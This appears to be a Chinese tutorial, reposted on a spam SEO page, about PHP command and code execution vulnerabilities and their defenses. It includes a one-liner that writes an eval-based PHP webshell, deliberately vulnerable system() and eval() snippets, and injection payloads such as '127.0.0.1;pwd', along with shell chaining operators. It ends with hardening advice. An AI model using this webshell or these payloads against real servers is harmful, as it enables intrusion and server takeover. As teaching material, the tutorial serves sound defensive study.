当前位置: 首页 > news >正文

做网站职校选什么专业/aso优化重要吗

做网站职校选什么专业,aso优化重要吗,网页设计制作网站步骤,哈密seo一、利用漏洞获取webshell 漏洞上传&#xff0c;形成一句话木马&#xff0c;利用命令执行获得webshell fputs(fopen("a.php","w"),<?php eval($_POST["cmd"])?>);以防过滤&#xff0c;可以利用ASCII转换&#xff0c;连接执行。 1.要点…

一、利用漏洞获取webshell

漏洞上传,形成一句话木马,利用命令执行获得webshell

fputs(fopen("a.php","w"),'<?php eval($_POST["cmd"])?>');

以防过滤,可以利用ASCII转换,连接执行。
在这里插入图片描述
1.要点:要清楚单双引号的区别。
单引号,引号内部的变量不会执行,直接输出。
双引号,会经过编译器解释后执行。

在这里插入图片描述
问:你看出来什么端倪了吗?
答:发现单引号只能解析\\’ 只能将这两个在字符串中 转义成 正常的斜杠与单引号,其他的都是原样输出。

第二个参数---------要当成字符串执行,因此用单引号。

2.{}
php中大括号的作用,如下:

a、不管什么程序,function name(){}, for(){},….这太多了,不说也知道什么用了。
b、KaTeX parse error: Expected '}', got 'EOF' at end of input: …字符串变量当成数组处理 c、{val},这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。

二、系统命令执行

应用有时需要调用一些执行系统命令的函数,
如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,
当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞

利用条件
1.应用调用执行系统命令的函数
2.将用户输入作为系统命令的参数拼接到了命令行中
3.没有对用户输入进行过滤或过滤不严

漏洞分类
1.代码层过滤不严
商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:
system("/bin/program --arg $arg");

2.系统的漏洞造成命令注入
bash破壳漏洞(CVE-2014-6271)

3.调用的第三方组件存在代码执行漏洞
如WordPress中用来处理图片的ImageMagick组件
JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy等)
ThinkPHP命令执行

漏洞危害
继承Web服务程序的权限去执行系统命令或读写文件
反弹shell
控制整个网站甚至控制服务器
进一步内网渗透
等等

1. system("$arg");                                      //直接输入即可
2. system("/bin/prog $arg");                     //直接输入;ls
3. system("/bin/prog -p $arg");                //和2一样
4. system("/bin/prog --p=\"$arg\"");      //可以输入";ls;"
5. system("/bin/prog --p='$arg'");          //可以输入';ls;'

在Linux上,上面的 ; 也可以用 | 、|| 代替

;    前面的执行完执行后面的
|    是管道符,显示后面的执行结果
||   当前面的执行出错时执行后面的
&    前面的语句为假则直接执行后面的
&&   A执行成功,然后才会执行B

在Windows上,不能用 ; 可以用 &、&&、|、|| 代替

A&B         前面的语句为假则直接执行后面的
A&&B     A执行成功,然后才会执行B
A|B         A的输出,作为B的输入
A||B         A执行失败,然后才会执行B

实例:

<?php$arg = $_GET['cmd'];if ($arg){system("$arg");}
?>

payload

cmd=ipconfig

示例二

<?php$arg = $_GET['cmd'];if ($arg) {system("ping -c 3 $arg");}
?>
cmd=127.0.0.1;pwd

代码执行:
在cmd.php中的代码如下:

<?phpeval($_REQUEST['code']);
?>

提交http:/127.0.0.1/1.php?code=phpinfo() 后就会执行phpinfo()

三、防护手段

1.禁用部分高危函数

在php.ini,找到disable_functions,添加禁用的函数名

2.严格过滤关键字符
“&&”、 “;” 、 “||” 等

3.严格限制允许的参数类型

http://www.jmfq.cn/news/5069449.html

相关文章:

  • 电子商务网站建设与维护总结/口碑营销
  • 龙岗网站建设公司哪家好/网站的seo如何优化
  • wordpress主题+清新/网站排名软件优化
  • wordpress安装空白/快优吧seo优化
  • 网站建设客源开发/网站设计费用明细
  • 做 网站 技术支持 抓获/朝阳区搜索优化seosem
  • 英文网站建设模板下载/网站管理和维护的主要工作有哪些
  • 工厂网站开发/网站制作出名的公司
  • 网站安全的必要性/企业网站营销实现方式
  • 自己如何建设外贸网站建站/seo搜索引擎优化师
  • 网站做快照怎么做/百度快速提交入口
  • 三明市建设局网站/管理系统
  • 博敏网站建设/百度下载免费安装到桌面
  • 北京做兼职网站有哪些/关键词查询工具软件
  • 如何使用二级域名做网站/什么优化
  • 短租网站那家做的好/简述seo的基本步骤
  • python手机版/网站优化效果
  • 网站机房建设解决方案/超级软文网
  • 微信怎么做网站/推荐6个免费国外自媒体平台
  • 临海市建设局网站/关键词搜索引擎优化推广
  • 山西住房建设厅官方网站/济南竞价托管公司
  • 网站推广优化方案/我赢网客服系统
  • 手机免费制作微信小程序/网站seo优化多少钱
  • 太原推广型网站建设/广州seo快速排名
  • 虚拟主机多网站/英文seo外链发布工具
  • 手机网站制作公司/网络营销学什么内容
  • 网站制作公司信科网络/做网站建设优化的公司排名
  • 网站推广如何做/色盲色弱测试
  • 芜湖公司做网站/网上店铺的推广方法有哪些
  • wordpress推荐插件/最专业的seo公司